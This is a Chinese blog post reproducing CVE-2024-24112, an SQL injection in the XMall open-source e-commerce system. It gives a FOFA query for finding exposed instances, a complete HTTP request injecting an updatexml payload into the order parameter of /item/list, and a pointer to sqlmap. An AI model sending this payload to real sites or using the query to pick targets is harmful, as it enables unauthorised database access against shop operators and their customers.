XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

一、产品简介

XMal 开源电商商城 是开发者Exrick的一款基于SOA架构Q的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。

二、漏洞概述

XMal 开源商城 itemlist./itemvistSearch,/svslog,lorderlist,/memmberlist、/meberlistremove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

三、影响范围

四、复现环境

fofa:app="XMall-后台管理系统"

五、漏洞复现

POC

复制代码
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close

手动burp验证

可以看到已经爆出了数据库名字,当然可以利用sqlmap来实现

自动化验证

相关推荐
liulilittle17 分钟前
主流防火墙策略绕过漏洞的修复方案与加固实践
网络·安全·网络安全·信息与通信·ip·通信
网络安全工程师老王2 小时前
DOM型XSS深度渗透实战
网络安全·渗透测试·xss
IT小馋猫2 小时前
从源码到生产:Apache 2.4.57 自动化安装实战指南(附脚本)
linux·服务器·网络·网络安全
Lx3524 小时前
EXPLAIN工具:查询执行计划分析与索引诊断
sql·mysql·性能优化
kingbal4 小时前
MySQL:要删除子查询所涉及表中的数据,直接使用原 SQL 会报错
数据库·sql·mysql
java1234_小锋5 小时前
MyBatis中的动态SQL是什么?
java·sql·mybatis
网络安全小吗喽5 小时前
靶场(二十五)---小白心得&&靶场体会---Access
服务器·windows·测试工具·网络安全·靶机
彬彬醤6 小时前
TikTok for Mac?Mac用户的TikTok使用指南
大数据·网络·tcp/ip·web安全·macos·重构
'tubug'9 小时前
XXE(XML外部实体注入)详解
xml·web安全
安 当 加 密12 小时前
双因子认证如何让Windows系统登录更安全?SLA操作系统双因素认证解决方案深度解析
windows·安全